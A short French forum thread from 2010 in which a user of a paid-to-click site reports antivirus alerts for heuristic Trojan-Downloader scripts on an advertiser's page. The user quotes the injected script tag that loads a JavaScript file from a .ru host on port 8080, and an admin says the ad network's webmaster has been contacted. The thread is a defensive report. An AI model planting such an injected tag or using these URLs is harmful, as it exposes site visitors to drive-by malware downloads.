
Vous n'êtes pas identifié.
salut
dans les clik remunere y en as une qui fait chier 
"h" ttp://www.smartbarre.com/clic.php?id=2834 ----> " banniere voiture ( point) com "
13/07/2010 09:43:21 Détectés: HEUR:Trojan-Downloader.Script.Generic Page Web "h" ttp://sisterqueen.ru:8080/ Name_Server.js Internet Explorer
15/07/2010 10:35:45 Détectés: HEUR:Trojan-Downloader.Script.Generic Page Web "h "ttp://jarpub.ru:8080/ Path.js Internet Explorer
16/07/2010 10:30:08 Détectés: HEUR:Trojan-Downloader.Script.Generic Page Web " h" ttp://marketholiday.ru:8080/ Offline.js Internet Explorer
j ai regarder sur la 'source de cette page 'voiture........' plus de 2000 ligne
</body>
</html>
<script type="text/javascript" src="h ttp://marketholiday.ru:8080/Offline.js"></script>
donc papa a mon avis faudrais la viré car meme si ca a laire 'heuristique' ca tourne vers du 'point' RU en 8080 bizar ces tentative de redirection
chohon
Dernière modification par chohon (16-07-10 10:48:56)
Hors ligne

Bonjour,
Oui effectivement, je pense que voitures.com n'y est pour rien,
c'est surtout l'utilisation de ce site à des fins de piratage.
J'ai contacté le webmaster de la régie.
Hors ligne